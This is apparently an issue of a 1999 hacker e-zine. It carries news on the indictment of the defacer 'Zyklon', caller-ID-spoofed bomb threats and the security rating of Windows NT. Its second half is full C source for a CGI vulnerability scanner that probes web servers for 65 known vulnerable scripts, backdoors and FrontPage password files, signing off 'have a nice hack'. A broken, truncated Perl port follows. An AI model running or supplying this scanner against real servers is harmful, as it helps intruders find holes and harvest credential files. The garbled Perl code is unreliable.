From on or about December 28, 1998, through on or about December 31, 1998, in the Eastern District of Virginia and elsewhere, ERIC BURNS, also known as "Zyklon," the defendant herein, knowingly and intentionally caused transmissions from a computer in Shoreline, Washington, of programs, information, codes, and commands, and as a result of such conduct, intentionally caused damage without authorization to a computer of Computer Tech Services, doing business as LaserNet, in Fairfax, Virginia, which was a protected computer used in interstate commerce and communication, and caused loss aggregating at least $5,000 to at least one individual between December 28, 1998, and March 1, 1999.

(In violation of Title 18, United States Code, Section 1030(a)(5)(A).)

                                  COUNT 3

THE GRAND JURY CHARGES THAT:

From on or about December 28, 1998, through on or about January 11, 1999, in the Eastern District of Virginia and elsewhere, ERIC BURNS, also known as "Zyklon," defendant herein, knowingly and intentionally caused the transmission from a computer in Shoreline, Washington, of programs, information, codes, and commands, and as a result of such conduct, intentionally caused damage without authorization to computers operated by Issue Dynamics, Inc. in Alexandria, Virginia, and Washington, D.C., which were protected computers used in interstate commerce and communications, and caused loss aggregating at least $5,000 to at least one individual between December 28, 1998, and March 1, 1999.

(In violation of Title 18, United States Code, Section 1030(a)(5)(A).)

                                        A TRUE BILL:

                                        __________________________
                                        FOREPERSON
                                        UNITED STATES GRAND JURY

(signed) ______________________
Helen F. Fahey
United States Attorney

(signed) ______________________
Justin W. Williams
Assistant United States Attorney
Chief, Criminal Division

(signed) ______________________
Jack Henly
Assistant United States Attorney

-=-

MSNBC;

Alleged USIA site hacker indicted
Grand jury hands down three counts of computer intrusion against ‘Zyklon’

By Brock N. Meeks
MSNBC

May 14 - A federal grand jury in Virginia Thursday charged a Washington state man, Eric Burns, with three counts of computer break-ins, including two high-profile hacks of the United States Information Agency. Burns, well-known in the electronic underground by his code name Zyklon, has also been questioned by the Secret Service in conjunction with other government site break-ins, MSNBC has learned.

BURNS’ CODE NAME, MENTIONED in court papers, taken from the poison gas used by the Nazis in concentration camps, was mentioned on the recent hack of the White House Web site in a "shout out" (hacker slang for words of praise for a fellow hacker). However, no details were available as to whether Burns was being questioned by the Secret Service in conjunction with the White House hack. One source told MSNBC, after speaking with Burns, that the Secret Service questioned him about other government sites but not the White House hack. The Secret Service declined to comment.

However, a source familiar with the investigation, which was carried out by the Computer Crimes Division of the Federal Bureau of Investigation, confirmed that the bureau acknowledged another agency is also investigating Burns. Calls to the FBI to discuss their investigation of Burns were not returned.

The three alleged break-ins charged to Burns took place from August of last year to January, according to court papers. Attempts to contact Burns, who lives in Shoreline, Wash., by phone, were unsuccessful. One source who spoke to Burns said he was on a plane and heading for a court appearance in Virginia on Monday.

The three counts in the indictment are for attacks on the computers of Electric Press in Herndon, Va., which hosts the USIA Web site; LaserNet in Fairfax, Va.; and Issue Dynamics Inc., which has computers in Alexandria, Va., and Washington, D.C. Each count mentions damages of at least $5,000.

The attack on USIA’s web site in January was particularly damaging and was the second time it had been allegedly hacked by Burns. Each of those hacks was signed by Zyklon. USIA, which operates the Voice of America broadcasts, is an extremely busy site; it’s a clearinghouse for U.S. information and heavily used by foreigners. The first USIA hack, which occurred in August, destroyed a lot of the site’s data, according to published reports at the time.

The second break-in seemed to be Burns’ way of working out his frustrations owing to a lost love. "Hack by Zyklon. Crystal, I love, (you?)" the hacked site said. In another Zyklon hacked site, this one of BellSouth, he laments that he has "massive depression," that he’s "a loser" and that "because of it I will never have my Crystal I will never be happy and I hope I goto [sic] prison and die."

Another hack attributed to Zyklon is that of the official Chinese human rights page, as seen on the Hacker News Network, which mirrors the hacked site. This hack appears to be an act of so-called "hacktivism" in which hackers break into systems, "own" them and put up politically charged speech.

-=-

ABC news;

Teen Hacker Indicted
‘Zyklon’ Not Charged in White House Attack

By Ted Bridis
The Associated Press

W A S H I N G T O N, May 15 - A teen-ager identified as a computer hacker whose name appeared on the Internet site for the White House after vandals altered it this week has been indicted in Virginia on charges he broke into another government computer. A grand jury indicted Eric Burns, 19, on three counts of computer intrusion.
Burns, reportedly known on the Internet as Zyklon, was accused of breaking into a computer between August 1998 and January 1999 in northern Virginia that is used by the U.S. Information Agency. Zyklon was one of a dozen names listed on the hacked version of the White House Web site, which was altered overnight Sunday for a few minutes before government computers automatically detected the intrusion.

‘A Serious Effort’

The indictment returned Thursday also accuses Burns of breaking into two other computers, one owned by LaserNet of Fairfax, Va., and the other by Issue Dynamics of Washington. Sam Simon of Issue Dynamics said he was cooperating with the FBI. "We firmly believe that computer criminals need to be identified, prosecuted and caught, and we’re pleased that the FBI is not treating this as a minor matter. It wasn’t an insignificant incident. It was a very concentrated, serious effort over a period of time."

Burns was not charged in the attack on the White House computers. The opening page of the White House site was altered briefly to show a black Web page with the names of the hacker organizations claiming responsibility, along with the messages "Your box was own3d" and "Stop all the war." The page also included the phrase "following peeps get some shouts," and listed a dozen names, including Zyklon.

@HWA

11.0 IRC war and a Police HQ bomb threat send two headed for trouble..
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

CallerID Fooled In Omaha
contributed by hantai

A bomb threat was called in to the Omaha police headquarters recently. The Police responded to the address reported by CallerID. While the police were at that address another bomb threat was called in from the same number. US West says that there are some "technical pieces of equipment" the criminals could use to make a phone call appear to come from someone's number without actually being at that phone. (Yeah, it's called a butt set and a telephone can on a street corner, real technical. Oh, and most of those cans aren't even locked.) HNN has received reports that the perpetrators of this prank are known as 'port' and 'rottenboy' on IRC and did this in retaliation for not being opped on an IRC channel.

Omaha NBC Affiliate Channel 6
http://www.discoveromaha.com/partners/wowt/news/1999/05/phone_threat_14.html

Police investigate mystery

A threatening phone call has led police to a mystery and so far the clues have turned up nothing more than dead ends. The call was made to Omaha police headquarters Thursday night: a bomb threat. With caller I-D on police phones, the name and address of the alleged caller was quickly discovered. Police made their way to a northwest Omaha home.

Officer Don Savage says, "When they arrived there, they met a young man who said he had a feeling that the police would be coming to his house that night." The young man had received an anonymous message on his computer telling him to expect a visit from the police.

While investigators were questioning the young man at his home, another call came in at police headquarters from the same number and address. Savage says, "911 contacted the sergeant on the scene at this house and asked 'is this the house?' And the sergeant confirmed no one had made a phone call from that house."

Carla Ewert with U.S. West says, "There are some technical pieces of equipment that are available if someone's going to use the phone lines dishonestly. And they technically could tap into someone's phone line from outside the house, never have to be in the person's home." Ewert says it's virtually impossible for someone to use their computer to call in a threat from someone else's phone line. She says the connection between voice and data is separated.

Right now police aren't sure what the computer connection is, or how the scheme was carried out. But a threat to their own house won't go unpunished. Channel six news talked to the family whose phone line has been used in this scheme. They are also baffled as to how their phone line was tapped. Police say they intend to stay on the case until an arrest is made.

@HWA

12.0 UK Labels Windows as 'secure'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

UK Labels Windows as Secure
contributed by toka25

The U.K. Information Technology Security Evaluation Criteria (ITSEC) must have been hit on the head, dropped at birth, or be taking some really good drugs. Why? They have awarded Windows NT Server 4.0 and Windows NT Workstation 4.0 an E3/FC-2 rating. Microsoft says that this is "the highest security evaluation possible for a general-purpose operating system". Either this is all Microsoft spin or the testers have never heard about things like pwdump or L0phtCrack.

Microsoft Propaganda
http://www.microsoft.com/windows/dailynews/042999.htm

April 29, 1999

U.K. government evaluation confirms security of Microsoft Windows NT 4.0 platform
Windows NT platform receives high security evaluation

London—The British government this week concluded that the Microsoft® Windows NT® platform passes muster when it comes to security. After more than a year of intensive testing, the U.K. Information Technology Security Evaluation Criteria (ITSEC) certification board has awarded Windows NT Server 4.0 and Windows NT Workstation 4.0 an E3/FC-2 rating—generally acknowledged as the highest security evaluation possible for a general-purpose operating system.

The security standards agency evaluation included examinations of the source code and design documentation of Windows NT 4.0 with Service Pack 3. Testers also had direct access to the engineers who designed and tested the server operating system. Their conclusion: the Windows NT 4.0 architecture provides robust but flexible security.

"The successful ITSEC evaluation confirms the robust security and design of Windows NT," said Edmund Muth, group product manager at Microsoft. "The strong security and wide range of security-related features in Windows NT benefit customers—both those in industries where security is a paramount concern, like banking, government, healthcare and the military—and individuals who are concerned about their privacy and e-commerce."

The comprehensive security architecture in the Windows NT platform provides that level of safety. Its integrated security features include strong authentication, fine-grained access control, real-world auditing tools and secure communications.

Governments and enterprises around the world have already put those features to use. Last Fall, Brazil used a Windows NT-based network to securely host the largest electronic elections in history. Requiring the highest level of security, nearly 90 percent of NATO's headquarters and field sites in Europe and the United States use a Windows NT-based system to deliver tactical data and military messaging. And in the private sector, one of New Zealand's largest banks counts on Windows NT to provide secure banking over the Internet.

The ITSEC rating provides independent confirmation of the platform's security features. ITSEC is the only evaluation scheme recognized by the British government for use in secure and sensitive installations. It is also officially recognized by the governments of many European Union countries, Canada, the former Soviet republics and, with slight variations, in New Zealand and Australia. The E3/F-C2 evaluation is roughly equivalent to a C2 evaluation under the U.S. Trusted Computer Security Evaluation Criteria (TCSEC) regime, better known as the "Orange Book." Microsoft is separately pursuing a C2 evaluation for Windows NT 4.0, which is expected to be completed shortly.

But security isn't the only thing this platform offers. The multipurpose server operating system that forms the foundation of the BackOffice® family, Windows NT Server 4.0 offers a comprehensive set of services. From communications and file and print services to a platform for building and hosting Web- and client-server-based applications, Windows NT Server is built to meet the many needs of business. Windows NT Workstation 4.0, developed specifically for the business environment, makes it easy to use, manage and integrate those features. The operating system gives employees the intuitive look and feel of Windows® 98, so companies can cut training costs, and people can work productively right from the start.

The Windows NT platform is also the quickest path to Windows 2000, which is designed to be Microsoft's most robust and reliable operating system to date. Windows 2000 is also designed with security in mind. Microsoft is taking orders for the Beta 3 versions of Windows 2000 Server and Workstation. After Microsoft releases Windows 2000, the company plans to submit the operating system for a similar security evaluation under the Common Criteria, a new evaluation system that will consolidate the TCSEC and ITSEC criteria. The results of which could further the Windows platform's reputation of providing secure computing.

@HWA

13.0 Yugoslavia to stay plugged in
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Yugoslavia to Stay Online
contributed by Code Kid

After all the confusion of whether companies should or should not pull the plug on Yugoslavia, the Clinton administration has promised not to unplug the region from the rest of the net.

Wired
http://www.wired.com/news/news/politics/story/19697.html

14.0 VISA Releases Draft Protection Profile
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Kingpin

According to Schneier's Crypto-Gram, Visa has issued a draft of the "Visa Smart Card Protection Profile," as part of the Common Criteria. It contains a very nice list of smart card attacks. The document is a draft, and they want comments.
Visa Smart Card Protection Profile
http://www.visa.com/nt/chip/accept.html
(you must agree to a disclaimer before being allowed to dl this pdf document)

The Visa document references the Common Criteria:

Common Criteria
http://csrc.ncsl.nist.gov/cc/

15.0 cgichk v1.35 by su1d sh3ll now scans for 65 vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

/* ---------------------------------------------------------------------- */
/* CGI scanner v1.35, m0dify and recode by su1d sh3ll //UnlG 1999         */
/* Tested on Slackware linux with kernel 2.0.35;RH 5.2(2.0.36);           */
/* FreeBSD 2.2.2-3.1;IRIX 5.3                                             */
/* Source c0de by [CKS & Fdisk]                                           */
/* gr33tz to: Packet St0rm and Ken, ADM crew, ech0 security and CKS, ch4x,*/
/*            el8.org users, #c0de, rain.forest.puppy/[WT], MnemoniX ,    */
/*            hypoclear of lUSt,codex ;-) , K.A.L.U.G.                    */
/* fuck to: www.hackzone.ru , HDT... CHC fuck u 2 , llamaz                */
/*          NATO and bill klinton <---- double fuck! :-) huh              */
/* c0ming s00n: add-on for CGI scanner - for scan "C" class subnet & logs */
/* -----------------------------------------------[10:01 17.05.99 UnlG]- */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

int main(int argc, char *argv[])
{
    int sock, debugm = 0;
    struct sockaddr_in sin;
    struct hostent *he;
    char foundmsg[] = "200";       /* any "200" anywhere in the reply counts as a hit */
    char *cgistr;
    char buffer[1024];
    int count = 0;
    int suxes = 0;
    int n;
    char cgibuff[1024];
    char *buff[100];               /* Don't u think 100 is enought? ;-)*/
    char *cginame[100];            /* Don't u think 100 is enought? */

    /* one raw HTTP/1.0 request per probe; index 0 is unused */
    buff[1]  = "GET /cgi-bin/unlg1.1 HTTP/1.0\n\n"; /* v0rt-fu when u modify source, check this first line.... that's my 8-) */
    buff[2]  = "GET /cgi-bin/rwwwshell.pl HTTP/1.0\n\n";
    buff[3]  = "GET /cgi-bin/phf HTTP/1.0\n\n";
    buff[4]  = "GET /cgi-bin/Count.cgi HTTP/1.0\n\n";
    buff[5]  = "GET /cgi-bin/test-cgi HTTP/1.0\n\n";
    buff[6]  = "GET /cgi-bin/nph-test-cgi HTTP/1.0\n\n";
    buff[7]  = "GET /cgi-bin/nph-publish HTTP/1.0\n\n";
    buff[8]  = "GET /cgi-bin/php.cgi HTTP/1.0\n\n";
    buff[9]  = "GET /cgi-bin/handler HTTP/1.0\n\n";
    buff[10] = "GET /cgi-bin/webgais HTTP/1.0\n\n";
    buff[11] = "GET /cgi-bin/websendmail HTTP/1.0\n\n";
    buff[12] = "GET /cgi-bin/webdist.cgi HTTP/1.0\n\n";
    buff[13] = "GET /cgi-bin/faxsurvey HTTP/1.0\n\n";
    buff[14] = "GET /cgi-bin/htmlscript HTTP/1.0\n\n";
    buff[15] = "GET /cgi-bin/pfdispaly.cgi HTTP/1.0\n\n";
    buff[16] = "GET /cgi-bin/perl.exe HTTP/1.0\n\n";
    buff[17] = "GET /cgi-bin/wwwboard.pl HTTP/1.0\n\n";
    buff[18] = "GET /cgi-bin/www-sql HTTP/1.0\n\n";
    buff[19] = "GET /cgi-bin/view-source HTTP/1.0\n\n";
    buff[20] = "GET /cgi-bin/campas HTTP/1.0\n\n";
    buff[21] = "GET /cgi-bin/aglimpse HTTP/1.0\n\n";
    buff[22] = "GET /cgi-bin/glimpse HTTP/1.0\n\n";
    buff[23] = "GET /cgi-bin/man.sh HTTP/1.0\n\n";
    buff[24] = "GET /cgi-bin/AT-admin.cgi HTTP/1.0\n\n";
    buff[25] = "GET /cgi-bin/filemail.pl HTTP/1.0\n\n";
    buff[26] = "GET /cgi-bin/maillist.pl HTTP/1.0\n\n";
    buff[27] = "GET /cgi-bin/jj HTTP/1.0\n\n";
    buff[28] = "GET /cgi-bin/info2www HTTP/1.0\n\n";
    buff[29] = "GET /cgi-bin/files.pl HTTP/1.0\n\n";
    buff[30] = "GET /cgi-bin/finger HTTP/1.0\n\n";
    buff[31] = "GET /cgi-bin/bnbform.cgi HTTP/1.0\n\n";
    buff[32] = "GET /cgi-bin/survey.cgi HTTP/1.0\n\n";
    buff[33] = "GET /cgi-bin/AnyForm2 HTTP/1.0\n\n";
    buff[34] = "GET /cgi-bin/textcounter.pl HTTP/1.0\n\n";
    buff[35] = "GET /cgi-bin/classifieds.cgi HTTP/1.0\n\n";
    buff[36] = "GET /cgi-bin/environ.cgi HTTP/1.0\n\n";
    buff[37] = "GET /cgi-bin/wrap HTTP/1.0\n\n";
    buff[38] = "GET /cgi-bin/cgiwrap HTTP/1.0\n\n";
    buff[39] = "GET /cgi-bin/guestbook.cgi HTTP/1.0\n\n";
    buff[40] = "GET /cgi-bin/edit.pl HTTP/1.0\n\n";
    buff[41] = "GET /cgi-bin/perlshop.cgi HTTP/1.0\n\n";
    buff[42] = "GET /_vti_inf.html HTTP/1.0\n\n";
    buff[43] = "GET /_vti_pvt/service.pwd HTTP/1.0\n\n";
    buff[44] = "GET /_vti_pvt/users.pwd HTTP/1.0\n\n";
    buff[45] = "GET /_vti_pvt/authors.pwd HTTP/1.0\n\n";
    buff[46] = "GET /_vti_pvt/administrators.pwd HTTP/1.0\n\n";
    buff[47] = "GET /_vti_bin/shtml.dll HTTP/1.0\n\n";
    buff[48] = "GET /_vti_bin/shtml.exe HTTP/1.0\n\n";
    buff[49] = "GET /cgi-dos/args.bat HTTP/1.0\n\n";
    buff[50] = "GET /cgi-win/uploader.exe HTTP/1.0\n\n";
    buff[51] = "GET /cgi-bin/rguest.exe HTTP/1.0\n\n";
    buff[52] = "GET /cgi-bin/wguest.exe HTTP/1.0\n\n";
    buff[53] = "GET /scripts/issadmin/bdir.htr HTTP/1.0\n\n";
    buff[54] = "GET /scripts/CGImail.exe HTTP/1.0\n\n";
    buff[55] = "GET /scripts/tools/newdsn.exe HTTP/1.0\n\n";
    buff[56] = "GET /scripts/fpcount.exe HTTP/1.0\n\n";
    buff[57] = "GET /cfdocs/expelval/openfile.cfm HTTP/1.0\n\n";
    buff[58] = "GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0\n\n";
    buff[59] = "GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0\n\n";
    buff[60] = "GET /cfdocs/expelval/sendmail.cfm HTTP/1.0\n\n";
    buff[61] = "GET /iissamples/exair/howitworks/codebrws.asp HTTP/1.0\n\n";
    buff[62] = "GET /iissamples/sdk/asp/docs/codebrws.asp HTTP/1.0\n\n";
    buff[63] = "GET /msads/Samples/SELECTOR/showcode.asp HTTP/1.0\n\n";
    buff[64] = "GET /search97.vts HTTP/1.0\n\n";
    buff[65] = "GET /carbo.dll HTTP/1.0\n\n";
    /* we have at archive about 70 CGi , rule? ;-) */

    /* display names, padded so the "Searching for" column lines up */
    cginame[1]  = "UnlG - backd00r ";
    cginame[2]  = "THC - backd00r  ";
    cginame[3]  = "phf..classic :) ";
    cginame[4]  = "Count.cgi       ";
    cginame[5]  = "test-cgi        ";
    cginame[6]  = "nph-test-cgi    ";
    cginame[7]  = "nph-publish     ";
    cginame[8]  = "php.cgi         ";
    cginame[9]  = "handler         ";
    cginame[10] = "webgais         ";
    cginame[11] = "websendmail     ";
    cginame[12] = "webdist.cgi     ";
    cginame[13] = "faxsurvey       ";
    cginame[14] = "htmlscript      ";
    cginame[15] = "pfdisplay       ";
    cginame[16] = "perl.exe        ";
    cginame[17] = "wwwboard.pl     ";
    cginame[18] = "www-sql         ";
    cginame[19] = "view-source     ";
    cginame[20] = "campas          ";
    cginame[21] = "aglimpse        ";
    cginame[22] = "glimpse         ";
    cginame[23] = "man.sh          ";
    cginame[24] = "AT-admin.cgi    ";
    cginame[25] = "filemail.pl     ";
    cginame[26] = "maillist.pl     ";
    cginame[27] = "jj              ";
    cginame[28] = "info2www        ";
    cginame[29] = "files.pl        ";
    cginame[30] = "finger          ";
    cginame[31] = "bnbform.cgi     ";
    cginame[32] = "survey.cgi      ";
    cginame[33] = "AnyForm2        ";
    cginame[34] = "textcounter.pl  ";
    cginame[35] = "classifields.cgi";
    cginame[36] = "environ.cgi     ";
    cginame[37] = "wrap            ";
    cginame[38] = "cgiwrap         ";
    cginame[39] = "guestbook.cgi   ";
    cginame[40] = "edit.pl         ";
    cginame[41] = "perlshop.cgi    ";
    cginame[42] = "_vti_inf.html   ";
    cginame[43] = "service.pwd     ";
    cginame[44] = "users.pwd       ";
    cginame[45] = "authors.pwd     ";
    cginame[46] = "administrators  ";
    cginame[47] = "shtml.dll       ";
    cginame[48] = "shtml.exe       ";
    cginame[49] = "args.bat        ";
    cginame[50] = "uploader.exe    ";
    cginame[51] = "rguest.exe      ";
    cginame[52] = "wguest.exe      ";
    cginame[53] = "bdir - samples  ";
    cginame[54] = "CGImail.exe     ";
    cginame[55] = "newdsn.exe      ";
    cginame[56] = "fpcount.exe     ";
    cginame[57] = "openfile.cfm    ";
    cginame[58] = "exprcalc.cfm    ";
    cginame[59] = "dispopenedfile  ";
    cginame[60] = "sendmail.cfm    ";
    cginame[61] = "codebrws.asp    ";
    cginame[62] = "codebrws.asp 2  ";
    cginame[63] = "showcode.asp    ";
    cginame[64] = "search97.vts    ";
    cginame[65] = "carbo.dll       ";

    if (argc < 2) {
        printf("\n [-- CGI Checker 1.35. Modified by su1d sh3ll //UnlG --]");
        printf("\nusage : %s host ", argv[0]);
        printf("\n Or : %s host -d for debug mode\n\n", argv[0]);
        exit(0);
    }
    /* the original called strstr("-d", argv[2]) with the arguments the wrong way round */
    if (argc > 2 && strcmp(argv[2], "-d") == 0) {
        debugm = 1;
    }
    if ((he = gethostbyname(argv[1])) == NULL) {
        herror("gethostbyname");
        exit(0);
    }

    printf("\n\n\t [CKS & Fdisk]'s CGI Checker - modify by su1d sh3ll //UnlG\n\n\n");

    /* first connection: grab the Server: banner with a HEAD request */
    sock = socket(AF_INET, SOCK_STREAM, 0);
    memset(&sin, 0, sizeof(sin));
    memcpy(&sin.sin_addr, he->h_addr_list[0], he->h_length);
    sin.sin_family = AF_INET;
    sin.sin_port = htons(80); /* <--- if u want scan another port change it */
    /* codex when u again change this code pls call proggi like this 1.35.1 or 1.35.[a..z] ;-) */
    if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {
        perror("connect");
        exit(1);
    }
    printf("\n\n\t [ Press any key to check out the httpd version...... ]\n");
    getchar(); /* CKS sorry, but ur new piece of code don't work :-( */
    send(sock, "HEAD / HTTP/1.0\n\n", 17, 0);
    n = recv(sock, buffer, sizeof(buffer) - 1, 0);
    if (n < 0)
        n = 0;
    buffer[n] = '\0';              /* recv() does not terminate the string */
    printf("%s", buffer);
    close(sock);

    printf("\n\t [ Press any key to search 4 CGI stuff...... ]\n");
    getchar();

    /* one fresh connection per probe (HTTP/1.0, no keep-alive) */
    while (count++ < 65) {         /* huh! 65 cgi..... no secur1ty in th1s w0rld ;-)*/
        sock = socket(AF_INET, SOCK_STREAM, 0);
        memset(&sin, 0, sizeof(sin));
        memcpy(&sin.sin_addr, he->h_addr_list[0], he->h_length);
        sin.sin_family = AF_INET;
        sin.sin_port = htons(80);
        if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {
            perror("connect");
            close(sock);
            continue;
        }
        printf("Searching for %s : ", cginame[count]);
        memset(cgibuff, 0, sizeof(cgibuff));
        send(sock, buff[count], strlen(buff[count]), 0);
        recv(sock, cgibuff, sizeof(cgibuff) - 1, 0);
        cgistr = strstr(cgibuff, foundmsg);
        if (cgistr != NULL) {
            printf("Found !! ;)\n");
            ++suxes;
        } else {
            printf("Not Found\n");
        }
        if (debugm == 1) {
            printf("\n\n ------------------------\n %s \n ------------------------\n", cgibuff);
            printf("Press any key to continue....\n");
            getchar();
        }
        close(sock);
    }

    if (suxes) {
        printf("...have a nice hack... ;-)\n");
    } else {
        printf("...n0thing wr0ng on server..... hmm...sucks!\n");
    }
    return 0;
}

@HWA

15.1 cgichk.pl PERL version of the above cgi scanner from Wiltered Fire
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

#!/usr/bin/perl
##############################################
#                                            #
#  CGI scanner in perl                       #
#  Written By: Epicurus (epicurus@wilter.com) #
#                                            #
#  Based on a C version by su1d sh3ll        #
#                                            #
##############################################

use Socket;

@cgi_scripts = ("GET /cgi-bin/rwwwshell.pl HTTP/1.0\n\n","GET /cgi-bin/phf HTTP/1.0\n\n",
    "GET /cgi-bin/Count.cgi HTTP/1.0\n\n","GET /cgi-bin/test-cgi HTTP/1.0\n\n",
    "GET /cgi-bin/nph-test-cgi HTTP/1.0\n\n","GET /cgi-bin/nph-publish HTTP/1.0\n\n",
    "GET /cgi-bin/php.cgi HTTP/1.0\n\n","GET /cgi-bin/handler HTTP/1.0\n\n",
    "GET /cgi-bin/webgais HTTP/1.0\n\n","GET /cgi-bin/websendmail HTTP/1.0\n\n",
    "GET /cgi-bin/webdist.cgi HTTP/1.0\n\n","GET /cgi-bin/faxsurvey HTTP/1.0\n\n",
    "GET /cgi-bin/htmlscript HTTP/1.0\n\n","GET /cgi-bin/pfdispaly.cgi HTTP/1.0\n\n",
    "GET /cgi-bin/perl.exe HTTP/1.0\n\n","GET /cgi-bin/wwwboard.pl HTTP/1.0\n\n",
    "GET /cgi-bin/www-sql HTTP/1.0\n\n","GET /cgi-bin/view-source HTTP/1.0\n\n",
    "GET /cgi-bin/campas HTTP/1.0\n\n","GET /cgi-bin/aglimpse HTTP/1.0\n\n",
    "GET /cgi-bin/glimpse HTTP/1.0\n\n","GET /cgi-bin/man.sh HTTP/1.0\n\n",
    "GET /cgi-bin/AT-admin.cgi HTTP/1.0\n\n","GET /cgi-bin/filemail.pl HTTP/1.0\n\n",
    "GET /cgi-bin/maillist.pl HTTP/1.0\n\n","GET /cgi-bin/jj HTTP/1.0\n\n",
    "GET /cgi-bin/info2www HTTP/1.0\n\n","GET /cgi-bin/files.pl HTTP/1.0\n\n",
    "GET /cgi-bin/finger HTTP/1.0\n\n","GET /cgi-bin/bnbform.cgi HTTP/1.0\n\n",
    "GET /cgi-bin/survey.cgi HTTP/1.0\n\n","GET /cgi-bin/AnyForm2 HTTP/1.0\n\n",
    "GET /cgi-bin/textcounter.pl HTTP/1.0\n\n","GET /cgi-bin/classifieds.cgi HTTP/1.0\n\n",
    "GET /cgi-bin/environ.cgi HTTP/1.0\n\n","GET /cgi-bin/wrap HTTP/1.0\n\n",
    "GET /cgi-bin/cgiwrap HTTP/1.0\n\n","GET /cgi-bin/guestbook.cgi HTTP/1.0\n\n",
    "GET /cgi-bin/edit.pl HTTP/1.0\n\n","GET /cgi-bin/perlshop.cgi HTTP/1.0\n\n",
    "GET /_vti_inf.html HTTP/1.0\n\n","GET /_vti_pvt/service.pwd HTTP/1.0\n\n",
    "GET /_vti_pvt/users.pwd HTTP/1.0\n\n","GET /_vti_pvt/authors.pwd HTTP/1.0\n\n",
    "GET /_vti_pvt/administrators.pwd HTTP/1.0\n\n","GET /_vti_bin/shtml.dll HTTP/1.0\n\n",
    "GET /_vti_bin/shtml.exe HTTP/1.0\n\n","GET /cgi-dos/args.bat HTTP/1.0\n\n",
    "GET /cgi-win/uploader.exe HTTP/1.0\n\n","GET /cgi-bin/rguest.exe HTTP/1.0\n\n",
    "GET /cgi-bin/wguest.exe HTTP/1.0\n\n","GET /scripts/issadmin/bdir.htr HTTP/1.0\n\n",
    "GET /scripts/CGImail.exe HTTP/1.0\n\n","GET /scripts/tools/newdsn.exe HTTP/1.0\n\n",
    "GET /scripts/fpcount.exe HTTP/1.0\n\n","GET /cfdocs/expelval/openfile.cfm HTTP/1.0\n\n",
    "GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0\n\n","GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0\n\n",
    "GET /cfdocs/expelval/sendmail.cfm HTTP/1.0\n\n","GET /iissamples/exair/howitworks/codebrws.asp HTTP/1.0\n\n",
    "GET /iissamples/sdk/asp/docs/codebrws.asp HTTP/1.0\n\n","GET /msads/Samples/SELECTOR/showcode.asp HTTP/1.0\n\n",
    "GET /search97.vts HTTP/1.0\n\n","GET /carbo.dll HTTP/1.0\n\n");

@cgi_names = ("THC - backdoor  ","phf             ","Count.cgi       ","test-cgi        ","nph-test-cgi    ",
    "nph-publish     ","php.cgi         ","handler         ","webgais         ","websendmail     ",
    "webdist.cgi     ","faxsurvey       ","htmlscript      ","pfdisplay       ","perl.exe        ",
    "wwwboard.pl     ","www-sql         ","view-source     ","campas          ","aglimpse        ",
    "glimpse         ","man.sh          ","AT-admin.cgi    ","filemail.pl     ","maillist.pl     ",
    "jj              ","info2www        ","files.pl        ","finger          ","bnbform.cgi     ",
    "survey.cgi      ","AnyForm2        ","textcounter.pl  ","classifields.cgi","environ.cgi     ",
    "wrap            ","cgiwrap         ","guestbook.cgi   ","edit.pl         ","perlshop.cgi    ",
    "_vti_inf.html   ","service.pwd     ","users.pwd       ","authors.pwd     ","administrators  ",
    "shtml.dll       ","shtml.exe       ","args.bat        ","uploader.exe    ","rguest.exe      ",
    "wguest.exe      ","bdir - samples  ","CGImail.exe     ","newdsn.exe      ","fpcount.exe     ",
    "openfile.cfm    ","exprcalc.cfm    ","dispopenedfile  ","sendmail.cfm    ","codebrws.asp    ",
    "codebrws.asp 2  ","showcode.asp    ","search97.vts    ","carbo.dll       ");

print "CGI scanner [in Perl] v1.0\n\n";
print "Host: "; chomp($remote=); print "HTTP Port [80]: "; chomp($port=); if($port eq "") { $port=80; } print "Log Session?(y/n)"; $yn=; if($yn =~ /y/i) { $log = 1; $logfile="$remote".".scan"; print "Log File [$logfile]: "; $file=; chop($file) if $file =~ /\n$/; if($file ne "") { $logfile=$file; } open(LOG,">>$logfile") || die("Unable to write to $logfile!"); print LOG "Scanning $remote port $port\n\n"; } print "Press [enter] to check the httpd version...\n"; $blah=; $submit = "HEAD / HTTP/1.0\r\n\r\n"; if($port =~ /\D/) { $port = getservbyname($port, 'tcp') } &error("No port specified.") unless $port; $iaddr = inet_aton($remote) || &error("Failed to find host: $remote"); $paddr = sockaddr_in($port, $iaddr) || &error("Some fucking thing!"); $proto = getprotobyname('tcp') || &error("Unable to get protocall!"); socket(SOCK, PF_INET, SOCK_STREAM, $proto) || &error("Failed to open socket: $!"); connect(SOCK, $paddr) || &error("Unable to connect: $!"); send(SOCK,$submit,0); while() { print $_; print LOG $_ if $log==1; } close(SOCK); print "Press [enter] to check for CGI vulnerabilities...\n"; $blah=; $i=0; foreach $cgi_script(@cgi_scripts) { print "Searching for @cgi_names[$i] : "; print LOG "Searching for @cgi_names[$i] : " if $log==1; $submit=$cgi_script; &connect_n_check; $i++; } if($bad_security>0) { print "Server may have CGI vulnerabilities.\n"; print LOG "Server may have CGI vulnerabilities.\n\n" if $log==1; } else { print "No known CGI vulnerabilities found.\n"; print LOG "No known CGI vulnerabilities found.\n\n" if $log==1; } close(LOG) if $log==1; exit; sub connect_n_check { if($port =~ /\D/) { $port = getservbyname($port, 'tcp') } &error("No port specified.") unless $port; $iaddr = inet_aton($remote) || &error("Failed to find host: $remote"); 